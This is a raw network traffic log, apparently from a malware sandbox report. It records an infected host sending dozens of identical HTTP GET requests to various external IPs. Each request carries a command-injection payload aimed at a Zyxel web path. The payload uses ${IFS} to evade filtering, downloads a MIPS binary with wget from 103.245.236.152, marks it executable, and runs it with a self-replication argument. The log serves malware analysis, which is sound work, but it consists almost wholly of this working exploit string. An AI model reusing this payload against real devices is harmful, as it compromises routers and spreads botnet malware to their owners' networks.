                                            Jan 14, 2024 15:50:53.696376085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8219192.168.2.235804282.60.238.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696399927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8220192.168.2.2341814166.155.121.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696413994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8221192.168.2.2341550165.4.237.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696449041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8222192.168.2.2360880112.162.157.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696464062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8223192.168.2.2350668136.27.151.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696486950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8224192.168.2.2357408146.238.150.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696511030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8225192.168.2.235133897.173.64.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696528912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8226192.168.2.2345200103.163.143.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696540117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8227192.168.2.235896225.226.29.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696572065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8228192.168.2.235023639.50.163.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696592093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8229192.168.2.2339078129.202.221.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696630955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8230192.168.2.2354754181.17.88.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696650982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8231192.168.2.2341622133.239.144.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696674109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8232192.168.2.2337184161.91.94.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696713924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8233192.168.2.2338978124.102.6.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696713924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8234192.168.2.2345444113.126.23.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696719885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8235192.168.2.2357440108.188.135.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696728945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8236192.168.2.234269884.23.188.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696768045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8237192.168.2.235353093.102.192.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696829081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8238192.168.2.2343148124.161.127.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696856022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8239192.168.2.2334542165.215.17.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696887016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8240192.168.2.2353832155.159.7.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696923971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8241192.168.2.234290095.171.221.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696949005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8242192.168.2.2351072155.108.15.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.696969032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8243192.168.2.2350314106.190.122.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697005033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8244192.168.2.234213612.219.34.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697032928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8245192.168.2.2342062162.6.244.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697056055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8246192.168.2.2338230223.139.6.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697097063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8247192.168.2.233406812.15.175.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697108030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8248192.168.2.235482089.242.181.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697123051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8249192.168.2.2342910167.48.43.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697145939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8250192.168.2.23377305.26.97.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697175026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8251192.168.2.234376635.191.195.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697211981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8252192.168.2.2333784176.204.139.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697247028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8253192.168.2.2341996107.78.189.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697274923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8254192.168.2.236002654.161.233.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697287083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8255192.168.2.2341146154.239.188.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697325945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8256192.168.2.2347800158.18.65.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697354078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8257192.168.2.2350368103.90.245.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697369099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8258192.168.2.233931620.85.230.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697398901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8259192.168.2.2342202104.159.169.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697426081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8260192.168.2.234582886.153.209.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697447062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8261192.168.2.234370486.225.57.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697462082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8262192.168.2.2351116160.166.75.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697480917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8263192.168.2.23477629.225.67.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697513103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8264192.168.2.2336160167.164.247.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697529078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8265192.168.2.2355682182.31.126.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697531939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8266192.168.2.2350156115.16.198.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697745085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8267192.168.2.235001073.114.81.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697745085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8268192.168.2.2339042128.249.228.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697761059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8269192.168.2.233280632.215.60.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697777987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8270192.168.2.235008661.62.74.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697802067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8271192.168.2.2358588217.7.73.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697813988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8272192.168.2.2341602158.162.219.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697838068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8273192.168.2.234532297.144.248.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697901011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8274192.168.2.2342802189.211.92.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697912931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8275192.168.2.234154060.33.156.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697917938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8276192.168.2.2354836103.16.87.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697937012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8277192.168.2.2360540100.213.3.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.697983980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8278192.168.2.2336080206.134.201.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698013067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8279192.168.2.234255631.130.91.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698043108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8280192.168.2.2345716120.26.249.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698075056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8281192.168.2.2344716204.201.133.156443
                                            TimestampBytes transferredDirectionData
